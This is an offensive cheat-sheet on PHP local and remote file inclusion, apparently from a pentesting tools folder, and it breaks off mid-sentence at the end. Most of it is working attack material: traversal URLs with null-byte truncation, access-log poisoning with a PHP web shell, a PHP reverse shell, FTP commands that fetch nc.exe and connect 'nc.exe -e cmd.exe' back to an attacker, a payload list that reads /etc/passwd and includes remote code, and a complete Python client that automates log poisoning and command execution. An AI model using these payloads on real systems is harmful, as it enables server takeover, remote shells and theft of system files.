CryptoZSH/tools/v3das/web_file_inclusion.txt
Local File Inclusion
====================
A %00 (null byte) in the included path makes PHP before 5.3.4 stop reading the string there, so whatever the application appends to the parameter (typically a file extension) is dropped. PHP 5.3.4 and later reject paths containing a null byte, and the trick fails.
Testing (confirm the inclusion with a known, harmless file first): http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&LANG=en../../../../../windows/system32/drivers/etc/hosts%00
...then plant PHP in the access log: open a raw connection and send the code as the request line, which Apache writes to access.log as-is:
~# nc 192.168.1.1 80
<?php echo shell_exec($_GET['cmd']);?>
...and execute it by including the log, with the command in cmd (XAMPP default log path shown):
http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&cmd=ipconfig&LANG=en../../../../../../xampp/apache/logs/access.log%00
...or, on Linux, make the planted code a PHP reverse shell (start a listener on 10.0.0.1:1234 first):
<?php $s=fsockopen("10.0.0.1",1234);exec("sh <&3 >&3 2>&3");?>
...finally send follow-up commands through cmd to get a proper shell. On Windows, fetch nc.exe from an FTP server you control (the two "haxy" echoes are the FTP user and password) and connect back:
# Windows: FTP download of nc.exe, then reverse shell
echo open 192.168.1.1 21 > ftp.txt && echo haxy>> ftp.txt && echo haxy >> ftp.txt && echo bin >> ftp.txt && echo GET nc.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt
nc.exe -e cmd.exe 192.168.1.1  31337
- - - - - - - -
The same sequence as PHP payloads, for when you can only inject PHP rather than type commands (short <? tags need short_open_tag=On; <?php always works):
<? system('echo open 192.168.1.1 21 > ftp.txt'); ?>
<? system('echo haxor >> ftp.txt'); ?>
<? system('echo haxor >> ftp.txt'); ?>
<? system('echo bin >> ftp.txt'); ?>
<? system('echo GET nc.exe >> ftp.txt'); ?>
<? system('echo bye >> ftp.txt'); ?>
<? system('ftp -s:ftp.txt'); ?>
<? system('nc.exe -e cmd.exe 192.168.1.1  31337'); ?>
Other useful payloads:
<?php phpinfo(); ?>
<? system("cat /etc/passwd"); ?>
<?php echo shell_exec($_GET["cmd"]);?>
<?php include("http://124.1.1.1/"); ?>
(the last one pulls code from an attacker-controlled host and needs allow_url_include=On)
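The log-poisoning steps above (plant a stager in access.log, include the log with the command in cmd, read the output back) as a small client. This is an added example, not code from the original cheat-sheet: the host, parameter names and the XAMPP log path are taken from the URLs above, while the marker strings, function names and the choice to carry the stager in the User-Agent header (instead of a bogus request line) are this example's own assumptions. It also builds the URL form used in the RFI section further down when given an http:// value.

```python
"""LFI log-poisoning helper (added example; not part of the original cheat-sheet).
Host, parameter names and the XAMPP log path come from the URLs in the text above;
marker strings and function names are hypothetical."""
import re
import socket
import urllib.request
from urllib.parse import urlencode

MARK_START = "__OUT_START__"
MARK_END = "__OUT_END__"

# PHP stager to be written into access.log.  Single quotes only: Apache writes
# double quotes into the log escaped as \" which would break the PHP.
STAGER = ("<?php echo '" + MARK_START + "';"
          "echo shell_exec($_GET['cmd']);"
          "echo '" + MARK_END + "'; ?>")


def poison_request(host, stager=STAGER):
    """Raw request that lands the stager in the log via the User-Agent field.
    A valid request line gives an ordinary log entry instead of relying on how
    the server records a malformed one."""
    return (
        "GET / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {stager}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def traversal(depth, target):
    """'../' repeated depth times, then the target path without its leading slash."""
    return "../" * depth + target.lstrip("/")


def include_url(base, param, value, null_byte=True, extra=None):
    """URL for the vulnerable include.  null_byte appends %00, which truncates
    whatever suffix the application adds to the path, but only on PHP < 5.3.4
    (later versions reject paths containing NUL).  value may also be an
    http:// URL for the remote-inclusion case."""
    params = dict(extra or {})
    params[param] = value + ("\x00" if null_byte else "")
    # safe="/" keeps the traversal readable, as in the cheat-sheet URLs.
    return base + "?" + urlencode(params, safe="/")


def lfi_url(base, param, target, depth=6, prefix="en", null_byte=True, extra=None):
    """LFI variant: keep the 'en' the app expects in front, then traverse."""
    return include_url(base, param, prefix + traversal(depth, target), null_byte, extra)


_OUT_RE = re.compile(re.escape(MARK_START) + r"(.*?)" + re.escape(MARK_END), re.S)


def carve_output(body):
    """Pull the command output out of the included log; None if the stager did
    not execute (wrong path, null byte rejected, code not in the log)."""
    m = _OUT_RE.search(body)
    return m.group(1) if m else None


def send_raw(host, port, data, timeout=5.0):
    """Send raw bytes and read until the server closes the connection."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(data)
        chunks = []
        while chunk := s.recv(4096):
            chunks.append(chunk)
    return b"".join(chunks)


def poison_and_run(host, base, cmd, log_path="xampp/apache/logs/access.log",
                   port=80, depth=6):
    """1) plant the stager, 2) include the log with cmd set, 3) carve the output."""
    send_raw(host, port, poison_request(host))
    url = lfi_url(base, "LANG", log_path, depth=depth,
                  extra={"name": "x", "comment": "", "cmd": cmd})
    body = urllib.request.urlopen(url, timeout=10).read().decode(errors="replace")
    return carve_output(body)


if __name__ == "__main__":
    print(poison_and_run("192.168.1.1", "http://192.168.1.1/addguestbook.php", "ipconfig"))
```

The poison request is only needed once; every later include of the log re-executes the stager, and the markers let you pick the output out of the rest of the (now very noisy) log. If carve_output returns None, check the traversal depth and whether the target PHP is new enough to reject the null byte.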
Remote file Inclusion
=====================
Example: http://192.168.1.1/add.php?name=asdasd&LANG=http://192.168.1.1/login.txt%00
This needs allow_url_include=On on the target (off by default since PHP 5.2); serve login.txt from a host that returns it as plain text rather than executing it, and the %00 again only matters on PHP before 5.3.4.
Note: the login.txt contains